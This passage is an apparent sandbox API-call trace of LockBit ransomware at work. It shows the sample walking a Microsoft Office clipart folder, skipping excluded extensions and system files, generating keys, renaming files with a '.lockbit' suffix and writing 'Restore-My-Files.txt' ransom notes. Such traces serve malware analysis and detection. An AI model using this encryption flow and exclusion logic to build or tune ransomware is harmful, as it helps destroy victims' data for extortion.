lpFileSize=0x3d70468*=20232) returned 1 [0151.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0151.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0151.928] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0151.933] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200377.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200377.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0151.933] malloc (_Size=0xa6) returned 0x1fa2ed8 [0151.933] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0151.934] free (_Block=0x1fa2ed8) [0151.934] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200377.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0151.934] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0151.934] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0151.934] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5398, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200383.WMF", cAlternateFileName="")) returned 1 [0151.934] lstrcmpiW (lpString1=".", lpString2="J0200383.WMF") returned -1 [0151.934] lstrcmpiW (lpString1="..", lpString2="J0200383.WMF") returned -1 [0151.935] PathFindExtensionW (pszPath="J0200383.WMF") returned=".WMF" [0151.935] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0151.935] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0151.936] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0151.937] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0151.937] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200383.WMF") returned 1 [0151.938] lstrcmpiW (lpString1="ntldr", lpString2="J0200383.WMF") returned 1 [0151.938] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200383.WMF") returned 1 [0151.938] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200383.WMF") returned -1 [0151.938] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200383.WMF") returned -1 [0151.938] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200383.WMF") returned 1 [0151.938] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200383.WMF") returned -1 [0151.938] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0151.938] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200383.WMF") returned=".WMF" [0151.938] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0151.938] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0151.938] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0151.939] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0151.939] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200383.WMF.lockbit") returned 72 [0151.939] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200383.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200383.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0151.944] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0151.944] malloc (_Size=0x40068) returned 0x3e70008 [0151.944] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=21400) returned 1 [0151.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0151.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0151.946] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0151.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200383.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200383.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0151.949] malloc (_Size=0xa6) returned 0x1fa2ed8 [0151.949] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0151.950] free (_Block=0x1fa2ed8) [0151.950] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200383.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0151.951] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0151.951] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0151.951] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x366e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200467.WMF", cAlternateFileName="")) returned 1 [0151.951] lstrcmpiW (lpString1=".", lpString2="J0200467.WMF") returned -1 [0151.951] lstrcmpiW (lpString1="..", lpString2="J0200467.WMF") returned -1 [0151.951] PathFindExtensionW (pszPath="J0200467.WMF") returned=".WMF" [0151.951] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0151.951] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0151.952] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0151.952] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200467.WMF") returned 1 [0151.953] lstrcmpiW (lpString1="ntldr", lpString2="J0200467.WMF") returned 1 [0151.953] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200467.WMF") returned 1 [0151.953] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200467.WMF") returned -1 [0151.953] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200467.WMF") returned -1 [0151.953] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200467.WMF") returned 1 [0151.953] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200467.WMF") returned -1 [0151.953] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0151.953] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200467.WMF") returned=".WMF" [0151.953] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0151.953] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0151.953] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0151.954] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0151.954] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200467.WMF.lockbit") returned 72 [0151.954] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200467.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200467.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0151.955] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0151.955] malloc (_Size=0x40068) returned 0x3ef0008 [0151.955] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=13934) returned 1 [0151.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0151.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0151.956] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0151.960] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200467.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200467.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0151.960] malloc (_Size=0xa6) returned 0x1fa2ed8 [0151.960] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0151.960] free (_Block=0x1fa2ed8) [0151.961] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200467.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0151.961] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0151.961] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0151.961] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x273e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200521.WMF", cAlternateFileName="")) returned 1 [0151.961] lstrcmpiW (lpString1=".", lpString2="J0200521.WMF") returned -1 [0151.961] lstrcmpiW (lpString1="..", lpString2="J0200521.WMF") returned -1 [0151.961] PathFindExtensionW (pszPath="J0200521.WMF") returned=".WMF" [0151.961] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0151.961] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0151.962] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.962] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW 